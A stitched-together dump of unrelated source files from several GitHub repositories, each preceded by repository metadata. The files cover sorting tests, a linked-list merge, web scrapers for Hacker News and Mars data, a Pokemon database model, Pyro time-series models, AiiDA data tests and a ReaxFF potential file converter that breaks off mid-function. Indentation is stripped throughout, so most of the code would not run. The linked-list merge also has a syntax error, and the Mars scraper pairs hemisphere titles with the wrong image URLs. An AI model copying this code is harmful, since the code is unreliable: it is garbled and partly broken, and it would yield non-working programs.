actual = insertion_sort(array_three)
expected = [-100, -23, 1, 1, 2, 2, 4, 4]
assert actual == expected
# print(insertion_sort([5, 26, 9, 4, 3]))
```
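The `insertion_sort` module under test is not included in this excerpt; a minimal sketch of an implementation that would satisfy the tests above (sorts in place and returns the list):
```python
# Hedged sketch of challenges/insertion_sort/insertion_sort.py (not shown in this excerpt).
def insertion_sort(arr):
    """Sort arr in place with insertion sort and return it."""
    for i in range(1, len(arr)):
        key = arr[i]
        j = i - 1
        while j >= 0 and arr[j] > key:  # shift larger elements one slot to the right
            arr[j + 1] = arr[j]
            j -= 1
        arr[j + 1] = key
    return arr
```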
#### File: challenges/ll_merge/ll_merge.py
```python
def mergeLists(self, other_list):
list1_curr = self.head
list2_curr = other_list.head
# This line of code checks to ensure that there are available positions in curr
while list1_curr != None and list2_curr != None
# Save next pointers
# Creating new variables which save next pointers
list1_next = list1_curr.next
list2_next = list2_curr.next
# Makes list2_curr as next of list1_curr
list2_curr.next = list1_next # changes the next pointer of list2_curr
list1_curr.next = list2_curr # changes the next pointer of list1_curr
# update current pointers for current iteration
# In my own words, I think these lines below are resetting the values to their original values so we can loop again in the while
list1_curr = list1_next
list2_curr = list2_next
other_list.head = list2_curr
```
#### File: site-packages/pytest_watch/util.py
```python
import os
import sys
from contextlib import contextmanager
@contextmanager
def silence():
"""
Silence stdout and stderr in a 'with' block.
"""
old_stdout = sys.stdout
old_stderr = sys.stderr
nullfd = open(os.devnull, 'w')
sys.stdout = nullfd
sys.stderr = nullfd
try:
yield
except Exception:
raise
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
nullfd.close()
``` |
{
"source": "jpchavat/hn-tops-topics",
"score": 3
} |
#### File: jpchavat/hn-tops-topics/hn-tops-topics.py
```python
import requests_html
from colorconsole import terminal
from collections import defaultdict
import re
import argparse
parser = argparse.ArgumentParser(description='# hn-tops-topics - Scrap the tops HN news and filters by topics\n'
'#\n'
'# Author: @jupachuy - github.com/jpchavat', prog='hn-tops-topic\n')
parser.add_argument('-p', '--max-pages', help='maximum amount of pages to scrap', default=3, type=int)
parser.add_argument('-n', '--max-news', help='maximum amount of news to scrap', default=15, type=int)
parser.add_argument('keywords', help='list of keywords to search while scrapping')
args = parser.parse_args()
#KEYWORDS = 'python,golang,bitcoin,ripple,xrp,stellar,xlm,crypto,uruguay'
KEYWORDS = args.keywords.split(',')
MAX_PAGES = args.max_pages
MAX_NEWS = args.max_news
def itruncate(string, width):
if len(string) > width:
string = string[:width-3] + '...'
return string
# Screen confs
screen = terminal.get_terminal()
screen.clear()
screen.set_title("HN tops topics")
current_line = 0
def get_current_line():
global current_line
current_line += 1
return current_line
# Print title
screen.xterm256_set_bk_color(208)
screen.xterm256_set_fg_color(234)
screen.print_at(0, get_current_line(), "|-----------------|")
screen.print_at(0, get_current_line(), "| HN tops topics |")
screen.print_at(0, get_current_line(), "|_________________|")
screen.underline()
get_current_line()
screen.print_at(0, get_current_line(), "Topic(s): %s" % " - ".join(KEYWORDS))
get_current_line()
screen.reset()
session = requests_html.Session()
# Build the regex with keywords
topics_regex = r"\b{}".format("|\\b".join(KEYWORDS))
# Scrap the web
topic_news_amount = 0
topic_news = defaultdict(list)
page = 1
while page <= MAX_PAGES and topic_news_amount < MAX_NEWS:
r = session.get('https://news.ycombinator.com/news?p=%s' % page)
news = ((x.text, x.absolute_links.pop()) for x in r.html.find('.storylink'))
for title, link in news:
if topic_news_amount == MAX_NEWS:
break
topic_matches = list(re.finditer(topics_regex, title, re.IGNORECASE))
#print("Finding '{}' in '{}'".format(topics_regex, title))
if topic_matches:
for topic in (x.group(0) for x in topic_matches):
topic_news[topic.upper()].append((title, link, page))
topic_news_amount += 1
page += 1
# Print the results
for topic, news in topic_news.items():
screen.xterm256_set_bk_color(208)
screen.xterm256_set_fg_color(234)
screen.print_at(0, get_current_line(), topic.upper())
screen.reset()
for num, (title, link, page) in enumerate(news):
line_to_write = get_current_line()
txt = "{:>3d} [P{:>2d}] ".format(num + 1, page)
screen.print_at(1, line_to_write, txt)
col = len(txt) + 1
txt = "{:<50s} ".format(itruncate(title, 50))
screen.print_at(col, line_to_write, txt)
col += len(txt)
txt = "{}".format(link)
screen.print_at(col, line_to_write, txt)
get_current_line()
screen.print_at(0, get_current_line(), "END.\n")
screen.reset()
``` |
{
"source": "jpchdiaz/Mongo-DB-Web-Scraping",
"score": 3
} |
#### File: jpchdiaz/Mongo-DB-Web-Scraping/app.py
```python
from flask import Flask, render_template, redirect
from flask_pymongo import pymongo
import scrape_mars
# create instance of Flask app
app = Flask(__name__)
# Create connection to Mongo
client = pymongo.MongoClient()
db = client.mars_db
collection = db.mars_data
# create route that renders index.html template and finds documents from mongo
@app.route("/")
def home():
# Find data
martian = list(db.collection.find())
print(martian)
# return template and data
return render_template("index.html", martian=martian)
# Route that will trigger scrape functions
@app.route("/scrape")
def scrape():
# db.collection.remove({})
martian = scrape_mars.scrape()
# db.mars_data.insert_one(martian)
db.collection.update(
{},
martian,
upsert=True
)
return redirect("http://127.0.0.1:5000", code=302)
if __name__ == "__main__":
app.run(debug=True)
```
#### File: jpchdiaz/Mongo-DB-Web-Scraping/scrape_mars.py
```python
from splinter import Browser
from bs4 import BeautifulSoup as bs
import re
import pandas as pd
def init_browser():
# @NOTE: Replace the path with your actual path to the chromedriver
executable_path = {"executable_path": "chromedriver.exe"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
#empty dictionary
mars_scrape = {}
#Mars News
browser = init_browser()
url = 'https://mars.nasa.gov/news/'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
titles = soup.find_all('div', class_='list_text')
for title in titles:
news_title = title.find('div', class_='content_title').find('a').text
news_print = title.find('div', class_='article_teaser_body').text
mars_scrape['news_title'] = news_title
mars_scrape['news_print'] = news_print
#JPL Featured Image
url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
featured_image = soup.find('article')['style']
url_extract = re.search("'.*'", featured_image).group(0).replace("'", "")
featured_image_url = (f'https://www.jpl.nasa.gov{url_extract}')
mars_scrape['featured_image_url'] = featured_image_url
#Mars Weather
url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(url)
for x in range(1, 2):
html = browser.html
soup = bs(html, 'html.parser')
tweets = soup.find_all('div', class_='js-tweet-text-container')
for tweet in tweets:
mars_weather = tweet.find('p').text
mars_scrape['mars_weather'] = mars_weather
#Mars Facts
url = 'http://space-facts.com/mars/'
tables = pd.read_html(url)
df = tables[0]
df.columns = ['', 'Mars']
df.set_index('', inplace=True)
html_table = df.to_html()
html_table = html_table.replace('\n', '')
mars_scrape['html_table'] = html_table
#Mars Hemispheres
cerberus_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/cerberus_enhanced'
schiaparelli_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/schiaparelli_enhanced'
syrtis_url = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/syrtis_major_enhanced'
marineris_url ='https://astrogeology.usgs.gov/search/map/Mars/Viking/valles_marineris_enhanced'
def image_scraper(url):
browser.visit(url)
html = browser.html
soup = bs(html, 'html.parser')
downloads = soup.find_all('div', class_='downloads')
for images in downloads:
scraped_imgs = images.find('a')['href']
return scraped_imgs
hemisphere_image_urls = [
{"title": "Valles Marineris Hemisphere", "img_url": image_scraper(cerberus_url)},
{"title": "Cerberus Hemisphere", "img_url": image_scraper(schiaparelli_url)},
{"title": "Schiaparelli Hemisphere", "img_url": image_scraper(syrtis_url)},
{"title": "Syrtis Major Hemisphere", "img_url": image_scraper(marineris_url)},
]
mars_scrape['hemisphere_image_urls'] = hemisphere_image_urls
return mars_scrape
``` |
{
"source": "jpchen/pgoapi",
"score": 3
} |
#### File: jpchen/pgoapi/model.py
```python
import logging
import os
import time
from peewee import Model, MySQLDatabase, SqliteDatabase, InsertQuery,\
IntegerField, CharField, DoubleField, BooleanField,\
DateTimeField, OperationalError
from datetime import datetime, timedelta
from base64 import b64encode
from . import config
from .utils import get_pokemon_name, get_args, send_to_webhook
from .transform import transform_from_wgs_to_gcj
from .customLog import printPokemon
log = logging.getLogger(__name__)
args = get_args()
class BaseModel(Model):
class Meta:
database = init_database()
@classmethod
def get_all(cls):
results = [m for m in cls.select().dicts()]
if args.china:
for result in results:
result['latitude'], result['longitude'] = \
transform_from_wgs_to_gcj(
result['latitude'], result['longitude'])
return results
class Pokemon(BaseModel):
# We are base64 encoding the ids delivered by the api
# because they are too big for sqlite to handle
encounter_id = CharField(primary_key=True, max_length=50)
spawnpoint_id = CharField()
pokemon_id = IntegerField()
latitude = DoubleField()
longitude = DoubleField()
disappear_time = DateTimeField()
@classmethod
def get_active(cls, swLat, swLng, neLat, neLng):
if swLat is None or swLng is None or neLat is None or neLng is None:
query = (Pokemon
.select()
.where(Pokemon.disappear_time > datetime.utcnow())
.dicts())
else:
query = (Pokemon
.select()
.where((Pokemon.disappear_time > datetime.utcnow()) &
(Pokemon.latitude >= swLat) &
(Pokemon.longitude >= swLng) &
(Pokemon.latitude <= neLat) &
(Pokemon.longitude <= neLng))
.dicts())
pokemons = []
for p in query:
p['pokemon_name'] = get_pokemon_name(p['pokemon_id'])
if args.china:
p['latitude'], p['longitude'] = \
transform_from_wgs_to_gcj(p['latitude'], p['longitude'])
pokemons.append(p)
return pokemons
@classmethod
def get_active_by_id(cls, ids, swLat, swLng, neLat, neLng):
if swLat is None or swLng is None or neLat is None or neLng is None:
query = (Pokemon
.select()
.where((Pokemon.pokemon_id << ids) &
(Pokemon.disappear_time > datetime.utcnow()))
.dicts())
else:
query = (Pokemon
.select()
.where((Pokemon.pokemon_id << ids) &
(Pokemon.disappear_time > datetime.utcnow()) &
(Pokemon.latitude >= swLat) &
(Pokemon.longitude >= swLng) &
(Pokemon.latitude <= neLat) &
(Pokemon.longitude <= neLng))
.dicts())
pokemons = []
for p in query:
p['pokemon_name'] = get_pokemon_name(p['pokemon_id'])
if args.china:
p['latitude'], p['longitude'] = \
transform_from_wgs_to_gcj(p['latitude'], p['longitude'])
pokemons.append(p)
return pokemons
``` |
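`init_database()` is referenced by `BaseModel.Meta` but is not part of this excerpt. A hedged sketch of what such a helper typically looks like given the imports above; the `args` attribute names used here are assumptions, not verified against the project's real CLI flags (in the actual module it would need to be defined before `BaseModel`):
```python
# Hedged sketch only: pick a peewee backend from runtime configuration.
def init_database():
    if args.db_type == 'mysql':  # assumed flag name
        log.info('Connecting to MySQL database on %s.', args.db_host)
        return MySQLDatabase(
            args.db_name,
            user=args.db_user,
            password=args.db_pass,
            host=args.db_host)
    log.info('Connecting to local SQLite database.')
    return SqliteDatabase(args.db)
```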
{
"source": "jpchen/pyro-models",
"score": 2
} |
#### File: pyro_models/misc/ma2.py
```python
import torch
import pyro
import pyro.distributions as dist
def init_vector(name, dims=None):
return pyro.sample(name, dist.Normal(torch.zeros(dims), 0.2 * torch.ones(dims)).to_event(1))
def validate_data_def(data):
assert 'T' in data, 'variable not found in data: key=T'
assert 'y' in data, 'variable not found in data: key=y'
# initialize data
T = data["T"]
y = data["y"]
def init_params(data):
params = {}
return params
def model(data, params):
# initialize data
T = data["T"]
y = data["y"]
# model block
mu = pyro.sample("mu", dist.HalfCauchy(2.5))
theta = pyro.sample("theta", dist.HalfCauchy(2.5).expand([2]))
sigma = pyro.sample("sigma", dist.HalfCauchy(2.5))
with torch.no_grad():
epsilon = init_vector("epsilon", dims=T)
epsilon[0] = y[0] - mu
epsilon[1] = y[1] - mu - theta[0] * epsilon[0]
for t in range(2, T):
epsilon[t] = y[t] - mu - theta[0] * epsilon[t - 1] - theta[1] * epsilon[t - 2]
for t in range(2, T):
pyro.sample("y_{}".format(t), dist.Normal(mu + theta[0] * epsilon[t - 1] + \
theta[1] * epsilon[t - 2], sigma), obs=y[t])
```
#### File: pyro_models/misc/stochastic-volatility-optimized.py
```python
import torch
import pyro
import pyro.distributions as dist
def init_vector(name, dims=None):
return pyro.sample(name, dist.Normal(torch.zeros(dims), 0.2 * torch.ones(dims)).to_event(1))
def validate_data_def(data):
assert 'T' in data, 'variable not found in data: key=T'
assert 'y' in data, 'variable not found in data: key=y'
# initialize data
T = data["T"]
y = data["y"]
def init_params(data):
params = {}
# initialize data
T = data["T"]
y = data["y"]
# assign init values for parameters
params["phi"] = pyro.sample("phi", dist.Uniform(-(1), 1))
return params
def model(data, params):
# initialize data
T = data["T"]
y = data["y"]
# init parameters
phi = params["phi"]
# initialize transformed parameters
h = init_vector("h", dims=(T)) # vector
# model block
sigma = pyro.sample("sigma", dist.HalfCauchy(5.))
mu = pyro.sample("mu", dist.Cauchy(0., 10.))
h_std = pyro.sample("h_std", dist.Normal(0., 1.).expand([T]))
with torch.no_grad():
h = h_std * sigma
h[0] = h[0] / torch.sqrt(1. - phi * phi)
h = h + mu
for t in range(1, T):
            h[t] = h[t] + phi * (h[t - 1] - mu)
    y = pyro.sample("y", dist.Normal(0., (h / 2.).exp()), obs=y)
``` |
{
"source": "JPchico/aiida-core",
"score": 2
} |
#### File: orm/data/test_data.py
```python
import os
import numpy
import pytest
from aiida import orm, plugins
from tests.static import STATIC_DIR
@pytest.fixture
@pytest.mark.usefixtures('clear_database_before_test')
def generate_class_instance():
# pylint: disable=too-many-return-statements, too-many-statements
"""Generate a dummy `Data` instance for the given sub class."""
def _generate_class_instance(data_class):
if data_class is orm.CifData:
instance = data_class(file=os.path.join(STATIC_DIR, 'data', 'Si.cif'))
return instance
if data_class is orm.UpfData:
filename = os.path.join(STATIC_DIR, 'pseudos', 'Ba.pbesol-spn-rrkjus_psl.0.2.3-tot-pslib030.UPF')
instance = data_class(file=filename)
return instance
if data_class is orm.StructureData:
instance = orm.CifData(file=os.path.join(STATIC_DIR, 'data', 'Si.cif')).get_structure()
return instance
if data_class is orm.BandsData:
kpoints = orm.KpointsData()
kpoints.set_cell([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
kpoints.set_kpoints([[0., 0., 0.], [0.1, 0.1, 0.1]])
instance = data_class()
instance.set_kpointsdata(kpoints)
instance.set_bands([[1.0, 2.0], [3.0, 4.0]])
return instance
if data_class is orm.TrajectoryData:
instance = data_class()
stepids = numpy.array([60])
times = stepids * 0.01
cells = numpy.array([[[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
positions = numpy.array([[[0., 0., 0.]]])
instance.set_trajectory(stepids=stepids, cells=cells, symbols=['H'], positions=positions, times=times)
return instance
if data_class is orm.UpfData:
filepath_base = os.path.abspath(os.path.join(STATIC_DIR, 'pseudos'))
filepath_carbon = os.path.join(filepath_base, 'C_pbe_v1.2.uspp.F.UPF')
instance = data_class(file=filepath_carbon)
return instance
if data_class is orm.ArrayData:
instance = data_class()
array_data = numpy.identity(3)
instance.set_array('data', array_data)
return instance
if data_class is orm.KpointsData:
instance = data_class()
cell = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
instance.set_cell(cell)
instance.set_kpoints_mesh_from_density(0.5)
return instance
if data_class is orm.XyData:
instance = data_class()
instance.set_x(numpy.arange(5), 'xdata', 'm')
instance.set_y(numpy.arange(5), 'ydata', 'm')
return instance
if data_class is orm.ProjectionData:
my_real_hydrogen_dict = {
'angular_momentum': -3,
'diffusivity': None,
'kind_name': 'As',
'magnetic_number': 0,
'position': [-1.420047044832945, 1.420047044832945, 1.420047044832945],
'radial_nodes': 0,
'spin': 0,
'spin_orientation': None,
'x_orientation': None,
'z_orientation': None
}
kpoints = orm.KpointsData()
kpoints.set_cell([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
kpoints.set_kpoints([[0., 0., 0.]])
bands = orm.BandsData()
bands.set_kpointsdata(kpoints)
bands.set_bands([[1.0]])
RealHydrogen = plugins.OrbitalFactory('core.realhydrogen') # pylint: disable=invalid-name
orbital = RealHydrogen(**my_real_hydrogen_dict)
instance = data_class()
instance.set_reference_bandsdata(bands)
instance.set_projectiondata(
orbital, list_of_pdos=numpy.asarray([1.0]), list_of_energy=numpy.asarray([1.0]), bands_check=False
)
return instance
raise RuntimeError(
'no instance generator implemented for class `{}`. If you have added a `_prepare_*` method '
'for this data class, add a generator of a dummy instance here'.format(data_class)
)
return _generate_class_instance
@pytest.fixture(scope='function', params=plugins.get_entry_points('aiida.data'))
def data_plugin(request):
"""Fixture that parametrizes over all the registered entry points of the ``aiida.data`` entry point group."""
return request.param.load()
@pytest.mark.usefixtures('clear_database_before_test')
def test_constructor():
"""Test the constructor.
Specifically, verify that the ``source`` attribute can be set through a keyword argument.
"""
source = {'id': 1}
node = orm.Data(source=source)
assert isinstance(node, orm.Data)
assert node.source == source
@pytest.mark.usefixtures('clear_database_before_test')
def test_data_exporters(data_plugin, generate_class_instance):
"""Verify that the return value of the export methods of all `Data` sub classes have the correct type.
It should be a tuple where the first should be a byte string and the second a dictionary.
"""
export_formats = data_plugin.get_export_formats()
if not export_formats:
return
instance = generate_class_instance(data_plugin)
for fileformat in export_formats:
content, dictionary = instance._exportcontent(fileformat) # pylint: disable=protected-access
assert isinstance(content, bytes)
assert isinstance(dictionary, dict)
``` |
{
"source": "JPchico/aiida-lammps",
"score": 2
} |
#### File: aiida_lammps/common/reaxff_convert.py
```python
import copy
import re
from aiida_lammps.validation import validate_against_schema
INDEX_SEP = "-"
KEYS_GLOBAL = (
"reaxff0_boc1",
"reaxff0_boc2",
"reaxff3_coa2",
"Triple bond stabilisation 1",
"Triple bond stabilisation 2",
"C2-correction",
"reaxff0_ovun6",
"Triple bond stabilisation",
"reaxff0_ovun7",
"reaxff0_ovun8",
"Triple bond stabilization energy",
"Lower Taper-radius",
"Upper Taper-radius",
"reaxff2_pen2",
"reaxff0_val7",
"reaxff0_lp1",
"reaxff0_val9",
"reaxff0_val10",
"Not used 2",
"reaxff0_pen2",
"reaxff0_pen3",
"reaxff0_pen4",
"Not used 3",
"reaxff0_tor2",
"reaxff0_tor3",
"reaxff0_tor4",
"Not used 4",
"reaxff0_cot2",
"reaxff0_vdw1",
"bond order cutoff",
"reaxff3_coa4",
"reaxff0_ovun4",
"reaxff0_ovun3",
"reaxff0_val8",
"Not used 5",
"Not used 6",
"Not used 7",
"Not used 8",
"reaxff3_coa3",
)
# TODO some variables lammps sets as global are actually species dependent in GULP, how to handle these?
KEYS_1BODY = (
"reaxff1_radii1",
"reaxff1_valence1",
"mass",
"reaxff1_morse3",
"reaxff1_morse2",
"reaxff_gamma",
"reaxff1_radii2",
"reaxff1_valence3",
"reaxff1_morse1",
"reaxff1_morse4",
"reaxff1_valence4",
"reaxff1_under",
"dummy1",
"reaxff_chi",
"reaxff_mu",
"dummy2",
"reaxff1_radii3",
"reaxff1_lonepair2",
"dummy3",
"reaxff1_over2",
"reaxff1_over1",
"reaxff1_over3",
"dummy4",
"dummy5",
"reaxff1_over4",
"reaxff1_angle1",
"dummy11",
"reaxff1_valence2",
"reaxff1_angle2",
"dummy6",
"dummy7",
"dummy8",
)
KEYS_2BODY_BONDS = (
"reaxff2_bond1",
"reaxff2_bond2",
"reaxff2_bond3",
"reaxff2_bond4",
"reaxff2_bo5",
"reaxff2_bo7",
"reaxff2_bo6",
"reaxff2_over",
"reaxff2_bond5",
"reaxff2_bo3",
"reaxff2_bo4",
"dummy1",
"reaxff2_bo1",
"reaxff2_bo2",
"reaxff2_bo8",
"reaxff2_pen1",
)
KEYS_2BODY_OFFDIAG = [
"reaxff2_morse1",
"reaxff2_morse3",
"reaxff2_morse2",
"reaxff2_morse4",
"reaxff2_morse5",
"reaxff2_morse6",
]
KEYS_3BODY_ANGLES = (
"reaxff3_angle1",
"reaxff3_angle2",
"reaxff3_angle3",
"reaxff3_coa1",
"reaxff3_angle5",
"reaxff3_penalty",
"reaxff3_angle4",
)
KEYS_3BODY_HBOND = (
"reaxff3_hbond1",
"reaxff3_hbond2",
"reaxff3_hbond3",
"reaxff3_hbond4",
)
KEYS_4BODY_TORSION = (
"reaxff4_torsion1",
"reaxff4_torsion2",
"reaxff4_torsion3",
"reaxff4_torsion4",
"reaxff4_torsion5",
"dummy1",
"dummy2",
)
DEFAULT_TOLERANCES = (
# ReaxFF angle/torsion bond order threshold,
# for bond orders in valence, penalty and 3-body conjugation
# GULP default: 0.001
("anglemin", 0.001),
# ReaxFF bond order double product threshold,
# for the product of bond orders (1-2 x 2-3, where 2 = pivot)
# Hard coded to 0.001 in original code, but this leads to discontinuities
# GULP default: 0.000001
("angleprod", 0.00001),
# ReaxFF hydrogen-bond bond order threshold
# Hard coded to 0.01 in original code.
# GULP default: 0.01
("hbondmin", 0.01),
# ReaxFF H-bond cutoff
# Hard coded to 7.5 Ang in original code.
# GULP default: 7.5
("hbonddist", 7.5),
# ReaxFF bond order triple product threshold,
# for the product of bond orders (1-2 x 2-3 x 3-4)
# GULP default: 0.000000001
("torsionprod", 0.00001),
)
def split_numbers(string):
"""Get a list of numbers from a string (even with no spacing).
:type string: str
    :param string: the string to extract the numbers from
:rtype: list
:Example:
>>> split_numbers("1")
[1.0]
>>> split_numbers("1 2")
[1.0, 2.0]
>>> split_numbers("1.1 2.3")
[1.1, 2.3]
>>> split_numbers("1e-3")
[0.001]
>>> split_numbers("-1-2")
[-1.0, -2.0]
>>> split_numbers("1e-3-2")
[0.001, -2.0]
"""
_match_number = re.compile("-?\\ *[0-9]+\\.?[0-9]*(?:[Ee]\\ *[+-]?\\ *[0-9]+)?")
string = string.replace(" .", " 0.")
string = string.replace("-.", "-0.")
return [float(s) for s in re.findall(_match_number, string)]
def read_lammps_format(lines, tolerances=None):
"""Read a reaxff file, in lammps format, to a standardised potential dictionary.
Parameters
----------
lines : list[str]
tolerances : dict or None
tolerances to set, that are not specified in the file.
Returns
-------
dict
Notes
-----
Default tolerances:
- anglemin: 0.001
    - angleprod: 1e-05
- hbondmin: 0.01
- hbonddist: 7.5
- torsionprod: 1e-05
"""
output = {
"description": lines[0],
"global": {},
"species": ["X core"], # X is always first
"1body": {},
"2body": {},
"3body": {},
"4body": {},
}
lineno = 1
# Global parameters
if lines[lineno].split()[0] != str(len(KEYS_GLOBAL)):
raise IOError("Expecting {} global parameters".format(len(KEYS_GLOBAL)))
for key in KEYS_GLOBAL:
lineno += 1
output["global"][key] = float(lines[lineno].split()[0])
output["global"][
"reaxff2_pen3"
] = 1.0 # this is not provided by lammps, but is used by GULP
tolerances = tolerances or {}
output["global"].update({k: tolerances.get(k, v) for k, v in DEFAULT_TOLERANCES})
# one-body parameters
lineno += 1
num_species = int(lines[lineno].split()[0])
lineno += 3
idx = 1
for i in range(num_species):
lineno += 1
symbol, values = lines[lineno].split(None, 1)
if symbol == "X":
species_idx = 0 # the X symbol is always assigned index 0
else:
species_idx = idx
idx += 1
output["species"].append(symbol + " core")
values = split_numbers(values)
for _ in range(3):
lineno += 1
values.extend(split_numbers(lines[lineno]))
if len(values) != len(KEYS_1BODY):
raise Exception(
"number of values different than expected for species {0}, "
"{1} != {2}".format(symbol, len(values), len(KEYS_1BODY))
)
key_map = {k: v for k, v in zip(KEYS_1BODY, values)}
key_map["reaxff1_lonepair1"] = 0.5 * (
key_map["reaxff1_valence3"] - key_map["reaxff1_valence1"]
)
output["1body"][str(species_idx)] = key_map
# two-body bond parameters
lineno += 1
num_lines = int(lines[lineno].split()[0])
lineno += 2
for _ in range(num_lines):
values = split_numbers(lines[lineno]) + split_numbers(lines[lineno + 1])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
key_name = "{}-{}".format(species_idx1, species_idx2)
lineno += 2
if len(values) != len(KEYS_2BODY_BONDS):
raise Exception(
"number of bond values different than expected for key {0}, "
"{1} != {2}".format(key_name, len(values), len(KEYS_2BODY_BONDS))
)
output["2body"][key_name] = {k: v for k, v in zip(KEYS_2BODY_BONDS, values)}
# two-body off-diagonal parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
key_name = "{}-{}".format(species_idx1, species_idx2)
lineno += 1
if len(values) != len(KEYS_2BODY_OFFDIAG):
raise Exception(
"number of off-diagonal values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_2BODY_OFFDIAG)
)
)
output["2body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_2BODY_OFFDIAG, values)}
)
# three-body angle parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
key_name = "{}-{}-{}".format(species_idx1, species_idx2, species_idx3)
lineno += 1
if len(values) != len(KEYS_3BODY_ANGLES):
raise Exception(
"number of angle values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_3BODY_ANGLES)
)
)
output["3body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_3BODY_ANGLES, values)}
)
# four-body torsion parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
species_idx4 = int(values.pop(0))
key_name = "{}-{}-{}-{}".format(
species_idx1, species_idx2, species_idx3, species_idx4
)
lineno += 1
if len(values) != len(KEYS_4BODY_TORSION):
raise Exception(
"number of torsion values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_4BODY_TORSION)
)
)
output["4body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_4BODY_TORSION, values)}
)
# three-body h-bond parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
key_name = "{}-{}-{}".format(species_idx1, species_idx2, species_idx3)
lineno += 1
if len(values) != len(KEYS_3BODY_HBOND):
raise Exception(
"number of h-bond values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_3BODY_HBOND)
)
)
output["3body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_3BODY_HBOND, values)}
)
return output
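# Hedged usage sketch (not part of the original module): how read_lammps_format might be called
# on a LAMMPS ReaxFF force-field file; the file name "ffield.reax" is an assumption used only
# for illustration.
def _example_read_reaxff(path="ffield.reax"):
    """Read a LAMMPS ReaxFF file into the standardised potential dictionary."""
    with open(path) as handle:
        return read_lammps_format(handle.read().splitlines())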
def format_lammps_value(value):
return "{:.4f}".format(value)
def write_lammps_format(data):
"""Write a reaxff file, in lammps format, from a standardised potential dictionary."""
# validate dictionary
validate_against_schema(data, "reaxff.schema.json")
output = [data["description"]]
# Global parameters
output.append("{} ! Number of general parameters".format(len(KEYS_GLOBAL)))
for key in KEYS_GLOBAL:
output.append("{0:.4f} ! {1}".format(data["global"][key], key))
# one-body parameters
output.extend(
[
"{0} ! Nr of atoms; cov.r; valency;a.m;Rvdw;Evdw;gammaEEM;cov.r2;#".format(
len(data["species"])
),
"alfa;gammavdW;valency;Eunder;Eover;chiEEM;etaEEM;n.u.",
"cov r3;Elp;Heat inc.;n.u.;n.u.;n.u.;n.u.",
"ov/un;val1;n.u.;val3,vval4",
]
)
idx_map = {}
i = 1
x_species_line = None
for idx, species in enumerate(data["species"]):
if species.endswith("shell"):
raise ValueError(
"only core species can be used for reaxff, not shell: {}".format(
species
)
)
species = species[:-5]
# X is not always present in 1body, even if it is used in nbody terms
# see e.g. https://github.com/lammps/lammps/blob/master/potentials/ffield.reax.cho
if species == "X" and str(idx) not in data["1body"]:
species_lines = []
else:
species_lines = [
species
+ " "
+ " ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[:8]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[8:16]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[16:24]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[24:32]
]
),
]
if species == "X":
# X is always index 0, but must be last in the species list
idx_map[str(idx)] = "0"
x_species_line = species_lines
else:
idx_map[str(idx)] = str(i)
i += 1
output.extend(species_lines)
if x_species_line:
output.extend(x_species_line)
    # two-body bond parameters
suboutout = []
for key in sorted(data["2body"]):
subdata = data["2body"][key]
if not set(subdata.keys()).issuperset(KEYS_2BODY_BONDS):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_BONDS[:8]]
),
" ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_BONDS[8:16]]
),
]
)
output.extend(
[
"{0} ! Nr of bonds; Edis1;LPpen;n.u.;pbe1;pbo5;13corr;pbo6".format(
int(len(suboutout) / 2)
),
"pbe2;pbo3;pbo4;n.u.;pbo1;pbo2;ovcorr",
]
+ suboutout
)
# two-body off-diagonal parameters
suboutout = []
for key in sorted(data["2body"]):
subdata = data["2body"][key]
if not set(subdata.keys()).issuperset(KEYS_2BODY_OFFDIAG):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_OFFDIAG]
)
]
)
output.extend(
[
"{0} ! Nr of off-diagonal terms; Ediss;Ro;gamma;rsigma;rpi;rpi2".format(
len(suboutout)
)
]
+ suboutout
)
# three-body angle parameters
suboutout = []
